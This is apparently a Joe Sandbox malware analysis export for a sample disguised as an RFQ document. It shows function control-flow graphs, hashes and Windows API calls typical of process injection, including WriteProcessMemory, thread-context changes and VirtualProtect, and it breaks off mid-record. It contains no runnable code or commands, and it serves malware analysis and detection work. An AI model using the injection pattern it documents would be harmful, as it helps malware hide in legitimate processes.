                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q$PH^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-4240619703
                                                                                                                                                                                                • Opcode ID: d7f6caaad8765ef2a06d21a088239528b623d7d0e73d9cfcbe58ed794b911296
                                                                                                                                                                                                • Instruction ID: 963aae2d60a8bb0a34c8e262371fcb368d85e14e5d22f3729af62455eb0c9096
                                                                                                                                                                                                • Opcode Fuzzy Hash: d7f6caaad8765ef2a06d21a088239528b623d7d0e73d9cfcbe58ed794b911296
                                                                                                                                                                                                • Instruction Fuzzy Hash: 63819074F04268DBEB249BA8D85876EB6E2FB84700F11846AE557DB384DE78CC42C752
                                                                                                                                                                                                Function 01724600 Relevance: 5.3, Strings: 4, Instructions: 264COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 5047 1724600-172460a 5049 172460c 5047->5049 5050 172460d-1724614 5047->5050 5049->5050 5052 1724674 5050->5052 5053 1724615-172461a 5050->5053 5056 1724676 5052->5056 5057 1724677-1724681 5052->5057 5054 172461c 5053->5054 5055 172461d-1724624 5053->5055 5054->5055 5058 1724684-1724686 5055->5058 5061 1724625-1724632 5055->5061 5056->5057 5057->5058 5059 172468e-172469d 5058->5059 5067 17246a4-17246a9 5059->5067 5063 1724634 5061->5063 5064 1724635-1724636 5061->5064 5063->5064 5065 1724638 5064->5065 5066 1724639-172463e 5064->5066 5065->5066 5068 1724640 5066->5068 5069 1724641-1724663 5066->5069 5070 1724665-1724668 5067->5070 5068->5069 5069->5070 5071 1724671 5070->5071 5072 172466a 5070->5072 5104 172467b-1724686 5071->5104 5072->5071 5073 1724973-172497a 5072->5073 5074 17248b0-17248bb 5072->5074 5075 17248f6-1724905 5072->5075 5076 1724915-1724931 5072->5076 5077 17246fa 5072->5077 5078 172477b-17247c2 5072->5078 5079 1724818-172481f 5072->5079 5080 17246de-17246e3 5072->5080 5081 172489c-17248a1 5072->5081 5082 1724963 5072->5082 5083 1724941 5072->5083 5084 17248a6-17248ab 5072->5084 5085 17246e5-17246e7 5072->5085 5086 17247ea-17247f1 5072->5086 5087 17246ab-17246c8 5072->5087 5088 172470b-1724721 5072->5088 5089 172486b-1724875 5072->5089 5090 1724888-1724895 5072->5090 5091 1724768-1724778 5072->5091 5092 17248ce-17248e1 5072->5092 5093 172480e-1724813 5072->5093 5094 17246cf-17246dc 5072->5094 5095 172496c-1724971 5072->5095 5121 17248c7-17248cc 5074->5121 5122 17248bd 5074->5122 5126 1724907 5075->5126 5127 172490e-1724913 5075->5127 5120 1724944-1724952 5076->5120 5141 1724933-172493f 5076->5141 5098 17246ff-1724702 5077->5098 5099 17248e3 5078->5099 5150 17247c8-17247d9 5078->5150 5079->5099 5103 1724825-1724847 5079->5103 5080->5070 5081->5098 5158 1724966 call 172b8e7 5082->5158 5159 1724966 call 172b7a5 5082->5159 5160 1724966 call 172bd45 5082->5160 5161 1724966 call 172b94a 5082->5161 5162 1724966 call 172b409 5082->5162 5163 1724966 call 172b749 5082->5163 5083->5120 5084->5098 5096 17246f3-17246f8 5085->5096 5097 17246e9 5085->5097 5086->5099 5100 17247f7-17247fb 5086->5100 5087->5094 5132 172472c-1724732 5088->5132 5128 1724881-1724886 5089->5128 5129 1724877 5089->5129 5090->5081 5091->5078 5102 17248e8 5092->5102 5093->5098 5094->5080 5101 1724957-172495a 5095->5101 5106 17246ee 5096->5106 5097->5106 5098->5088 5108 1724704 5098->5108 5099->5102 5110 1724807-172480c 5100->5110 5111 17247fd 5100->5111 5101->5082 5107 172495c 5101->5107 5113 17248ea-17248ed 5102->5113 5148 1724849-172484f 5103->5148 5149 172485f-1724866 5103->5149 5104->5059 5106->5070 5107->5073 5107->5082 5107->5095 5108->5073 5108->5074 5108->5075 5108->5076 5108->5078 5108->5079 5108->5081 5108->5082 5108->5083 5108->5084 5108->5086 5108->5088 5108->5089 5108->5090 5108->5091 5108->5092 5108->5093 5108->5095 5123 1724802 5110->5123 5111->5123 5113->5075 5125 17248ef 5113->5125 5120->5101 5131 17248c2 5121->5131 5122->5131 5123->5098 5125->5073 5125->5075 5125->5076 5125->5082 5125->5083 5125->5095 5133 172490c 5126->5133 5127->5133 5137 172487c 5128->5137 5129->5137 5131->5098 5143 1724739-1724742 5132->5143 5133->5113 5137->5098 5141->5113 5156 1724744 call 1725b70 5143->5156 5157 1724744 call 1725b30 5143->5157 5147 172474a-1724766 5147->5098 5151 1724853-1724855 5148->5151 5152 1724851 5148->5152 5149->5098 5164 17247db call 1725b70 5150->5164 5165 17247db call 1725b30 5150->5165 5151->5149 5152->5149 5154 17247e1-17247e5 5154->5098 5156->5147 5157->5147 5158->5095 5159->5095 5160->5095 5161->5095 5162->5095 5163->5095 5164->5154 5165->5154
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q$PH^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-3122343355
                                                                                                                                                                                                • Opcode ID: 324c9cb7b94c8026e626caf1645da33fe8844a9e802e2171c955c0b303abe244
                                                                                                                                                                                                • Instruction ID: bb7543cf7d7d68fa8395a02e665dc2d63c39914a49c21799b2406622bb0afe59
                                                                                                                                                                                                • Opcode Fuzzy Hash: 324c9cb7b94c8026e626caf1645da33fe8844a9e802e2171c955c0b303abe244
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58911470F042A4DFE7259FB8D85876EBBE2FB85700F05846AE447DB285DA788C42C752
                                                                                                                                                                                                Function 01729BE8 Relevance: 3.3, Strings: 2, Instructions: 767COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 6334 1729be8-172a0d6 6410 172a628-172a65d 6334->6410 6411 172a0dc-172a0ec 6334->6411 6415 172a669-172a687 6410->6415 6416 172a65f-172a664 6410->6416 6411->6410 6412 172a0f2-172a102 6411->6412 6412->6410 6413 172a108-172a118 6412->6413 6413->6410 6417 172a11e-172a12e 6413->6417 6428 172a689-172a693 6415->6428 6429 172a6fe-172a70a 6415->6429 6418 172a74e-172a753 6416->6418 6417->6410 6419 172a134-172a144 6417->6419 6419->6410 6421 172a14a-172a15a 6419->6421 6421->6410 6422 172a160-172a170 6421->6422 6422->6410 6424 172a176-172a186 6422->6424 6424->6410 6425 172a18c-172a19c 6424->6425 6425->6410 6427 172a1a2-172a1b2 6425->6427 6427->6410 6430 172a1b8-172a627 6427->6430 6428->6429 6436 172a695-172a6a1 6428->6436 6434 172a721-172a72d 6429->6434 6435 172a70c-172a718 6429->6435 6443 172a744-172a746 6434->6443 6444 172a72f-172a73b 6434->6444 6435->6434 6442 172a71a-172a71f 6435->6442 6445 172a6a3-172a6ae 6436->6445 6446 172a6c6-172a6c9 6436->6446 6442->6418 6545 172a748 call 80bcfb8 6443->6545 6546 172a748 call 80bcfc8 6443->6546 6444->6443 6456 172a73d-172a742 6444->6456 6445->6446 6454 172a6b0-172a6ba 6445->6454 6447 172a6e0-172a6ec 6446->6447 6448 172a6cb-172a6d7 6446->6448 6452 172a754-172a78f 6447->6452 6453 172a6ee-172a6f5 6447->6453 6448->6447 6460 172a6d9-172a6de 6448->6460 6465 172a791-172a79c 6452->6465 6466 172a79e-172a7a2 6452->6466 6453->6452 6457 172a6f7-172a6fc 6453->6457 6454->6446 6463 172a6bc-172a6c1 6454->6463 6456->6418 6457->6418 6460->6418 6463->6418 6465->6466 6467 172a7b4 6466->6467 6468 172a7a4-172a7b2 6466->6468 6471 172a7b6-172a7b8 6467->6471 6468->6471 6472 172a7ba-172a7bc 6471->6472 6473 172a7be-172a7c6 6471->6473 6472->6473 6475 172a7c8-172a7da 6473->6475 6476 172a7e9-172a7eb 6473->6476 6475->6476 6485 172a7dc-172a7e7 6475->6485 6477 172a819-172a82a 6476->6477 6478 172a7ed-172a7fa call 17297f0 6476->6478 6478->6477 6486 172a7fc-172a80b 6478->6486 6485->6476 6486->6477 6491 172a80d-172a817 6486->6491 6491->6477 6545->6418 6546->6418
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: $^q$$^q
                                                                                                                                                                                                • API String ID: 0-355816377
                                                                                                                                                                                                • Opcode ID: bcb998292184cf7b17eb3d0b05198e556e9ff08e87df61d83c5094fd9d4738da
                                                                                                                                                                                                • Instruction ID: 5a1b343cbe2facfb153fb1de941c9986e481a7dd90c034552ab3dcaaa7607871
                                                                                                                                                                                                • Opcode Fuzzy Hash: bcb998292184cf7b17eb3d0b05198e556e9ff08e87df61d83c5094fd9d4738da
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D621574A042198FEB25DBA8C864B9EBBB2FF94301F1080ADC10A6B7A4DF355D85DF51
                                                                                                                                                                                                Function 01726930 Relevance: 2.9, Strings: 2, Instructions: 378COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                                                                                • API String ID: 0-4258043069
                                                                                                                                                                                                • Opcode ID: 8512c3d782f058a141cbc564589bfe0dc280e1d94ffe4cdd934f6d8140ea7133
                                                                                                                                                                                                • Instruction ID: 8be3e9986bdaa44951e2b1f46054e34a581366808359ff19b08d85a0dcce8667
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8512c3d782f058a141cbc564589bfe0dc280e1d94ffe4cdd934f6d8140ea7133
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16D191307002259FDB159F68D858B6EBBA2FB88711F14856EFA06CB395CF749C82C791
                                                                                                                                                                                                Function 080BCFC8 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                                • Opcode ID: d899ab4c8436558078dae3d9758c92d9959fbb65098670934b7c1b9e3a9615ae
                                                                                                                                                                                                • Instruction ID: cd527d1fbfcdcacb04e493cfe6836e5f59cb3ca5f066d7f1530759a448d6dd06
                                                                                                                                                                                                • Opcode Fuzzy Hash: d899ab4c8436558078dae3d9758c92d9959fbb65098670934b7c1b9e3a9615ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDB14F703005018FEB559B2DC965BBDB7D7AF85A46F15446AE902CF3B2EA29CC828741
                                                                                                                                                                                                Function 06810040 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PH^q$PH^q
                                                                                                                                                                                                • API String ID: 0-1598597984
                                                                                                                                                                                                • Opcode ID: 26f52e01d3ffd86773cdfa4c54fab72d9584e187ae5f8ab7480bb48875af43fb
                                                                                                                                                                                                • Instruction ID: f846eac01cb31f6c3315ca957e1194b26df3bcb4fb7e42d8a4e35bed33863a7f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 26f52e01d3ffd86773cdfa4c54fab72d9584e187ae5f8ab7480bb48875af43fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: D9C12774A00218CFCB94DF68C994AAD7BF6BF88315F1545A8E516EB3A1DB31EC81CB50
                                                                                                                                                                                                Function 01727020 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,bq$,bq
                                                                                                                                                                                                • API String ID: 0-2699258169
                                                                                                                                                                                                • Opcode ID: e57246527ba04feb0085944b8f84472916f2cb1ffcbc60338e817794dd985ef9
                                                                                                                                                                                                • Instruction ID: 12de5b5eb8715344fc163443539e6fcef169c0cf2df2d2a95be2e139d480b5df
                                                                                                                                                                                                • Opcode Fuzzy Hash: e57246527ba04feb0085944b8f84472916f2cb1ffcbc60338e817794dd985ef9
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA819134A041258FDB1CCF6DCA94A6AFBF2BF9A310B2581A9E505D7361D731E842CB91
                                                                                                                                                                                                Function 06816800 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Hbq$PH^q
                                                                                                                                                                                                • API String ID: 0-1164131142
                                                                                                                                                                                                • Opcode ID: 7ba7ea1c984321e318c7fcdd8c327c14d5f4bd5bc56d861b976c2a35f89d915b
                                                                                                                                                                                                • Instruction ID: 681720768fb751ff8dd7df474f74fec2b65ea8d18100c030d9307ec0c672cb54
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ba7ea1c984321e318c7fcdd8c327c14d5f4bd5bc56d861b976c2a35f89d915b
                                                                                                                                                                                                • Instruction Fuzzy Hash: A2814870A102149FCB54DF28C994A6DBBF6FF88311B1186A9E956DF3A1DB30EC41CB50
                                                                                                                                                                                                Function 017286E0 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                                • Opcode ID: 1fe6517ca59ec33d452a160b10d4d899f89cd3091455f54bebf58e7ceeef3af6
                                                                                                                                                                                                • Instruction ID: c46f593682aeb7247037a1aa7381fa381a17fe526993b2b2c3b9b1903de70b17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fe6517ca59ec33d452a160b10d4d899f89cd3091455f54bebf58e7ceeef3af6
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF024B70601125DFCB15CF68C984A6AFBF6FF88350F158598E4059B2A6C732ED82CB62
                                                                                                                                                                                                Function 0819E6F3 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                • Opcode ID: d3e8f0a807e5122aef157f4f29469331d3e61ae8b51b0cc1b10d9d7cefee4c46
                                                                                                                                                                                                • Instruction ID: de23c7b780721828b162cadcf447ccd953270062745131cc7255f30503fc82d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3e8f0a807e5122aef157f4f29469331d3e61ae8b51b0cc1b10d9d7cefee4c46
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94E15570D09218CFCB14DFA9D8487ADBBB1FF4A301F0594AAD089A7252DB744E99CF52
                                                                                                                                                                                                Function 068216C6 Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06821760
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                • Opcode ID: 65f58058239bfac81439dd1fcaec820641cbe5b93a7528992194f01f43f93c25
                                                                                                                                                                                                • Instruction ID: 58dee1ffa8b647730e2ec5af2cb9065e136cef64cc84d5ae8b8468a0db9bfde6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65f58058239bfac81439dd1fcaec820641cbe5b93a7528992194f01f43f93c25
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5031E6B0C093959FCB12CF69C8546DEBFB0EF46210F16819BC594E7292C3385949CBA1
                                                                                                                                                                                                Function 080ADFF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 080AE088
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                • Opcode ID: 192fd934e359258bd0a90340bfdc4b0027f4c91b003bcebe2920fb629384435d
                                                                                                                                                                                                • Instruction ID: eb1b4aa5246c4051dfef2bfb0076ea48adec07fb769f850b771ce9d8620f1fa7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 192fd934e359258bd0a90340bfdc4b0027f4c91b003bcebe2920fb629384435d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 792136B19003499FCB10DFAAC885BDEBBF5FF48310F10842AE919A7241C779A955CFA4
                                                                                                                                                                                                Function 0682DF03 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0682DF9B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: a4f2bb9335543775f70e65a189bae903f23876a6ab1353b17aa64affd81ec23e
                                                                                                                                                                                                • Instruction ID: fd1b1007dfa9a79e8b79ec417a6a6bc705010872a9a15df3423a3d46711233ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: a4f2bb9335543775f70e65a189bae903f23876a6ab1353b17aa64affd81ec23e
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA2148719053899FCB10CFAAC844ADEFFF4AF49320F15845AE859E7292C374A584CFA1
                                                                                                                                                                                                Function 080AE738 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 080AE7B6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: 5e4364629afaa38cfa9cd3e285b9e6a33ce65b6c6bb6bb96a36de7fbaae34477
                                                                                                                                                                                                • Instruction ID: 4042b0f8c3ea4bf2c26d7d7c132f8a7cc22588d182a0bdcc4129040a9e455f87
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e4364629afaa38cfa9cd3e285b9e6a33ce65b6c6bb6bb96a36de7fbaae34477
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9213A719003098FDB10DFAAC4857EEBBF5EF88324F10842DD419A7241CB789945CFA4
                                                                                                                                                                                                Function 080AD5D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 080AD64E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: dff79f0afc3d9f1b2a702378a7b225d16a5fbe6e8ac62fce2d047bd6e4ea245e
                                                                                                                                                                                                • Instruction ID: 481a4a7dad67bde2a3df1e77ca11db3db48397ea29e2dce41ba6d69cc1f4cf54
                                                                                                                                                                                                • Opcode Fuzzy Hash: dff79f0afc3d9f1b2a702378a7b225d16a5fbe6e8ac62fce2d047bd6e4ea245e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 352139719003098FDB10DFAAC4857EEBBF5EB48314F108429D519A7240C778A945CBA4
                                                                                                                                                                                                Function 080AE498 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 080AE50F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: 0fc52cdbeb4584598bb14f7c2305c5e10ad95ba36005b8f7930f540de4b8a096
                                                                                                                                                                                                • Instruction ID: 19d0027a65ef50049587eef4242c166c80a6480afd99f8c5355738ed0c8d8161
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc52cdbeb4584598bb14f7c2305c5e10ad95ba36005b8f7930f540de4b8a096
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF2118B18002499FDB10DFAAC845BEEBBF5EF48320F108429D519A7240D779A955DFA1
                                                                                                                                                                                                Function 080A4401 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 080A447B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: de10843630a299d040855bbd196f750c098e9e6079b3d100bb2003a43e573e0f
                                                                                                                                                                                                • Instruction ID: 6140bb86ea6ff92e58d0427ae06aa9cf63bd4bb1b755be3644e385f69fc63123
                                                                                                                                                                                                • Opcode Fuzzy Hash: de10843630a299d040855bbd196f750c098e9e6079b3d100bb2003a43e573e0f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59214AB58003499FCB10DF9AD444BDEFBF4FB48320F10842AE858A3650C375A544CFA1
                                                                                                                                                                                                Function 068216F0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06821760
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                • Opcode ID: 072995af75fac73e47ba2e7bddf8cd2129575c5edf4cf8ebfa3066ef018a5607
                                                                                                                                                                                                • Instruction ID: 7579904dd77270087020f6afa631d48818b61606445793d06eb4a884442b2db6
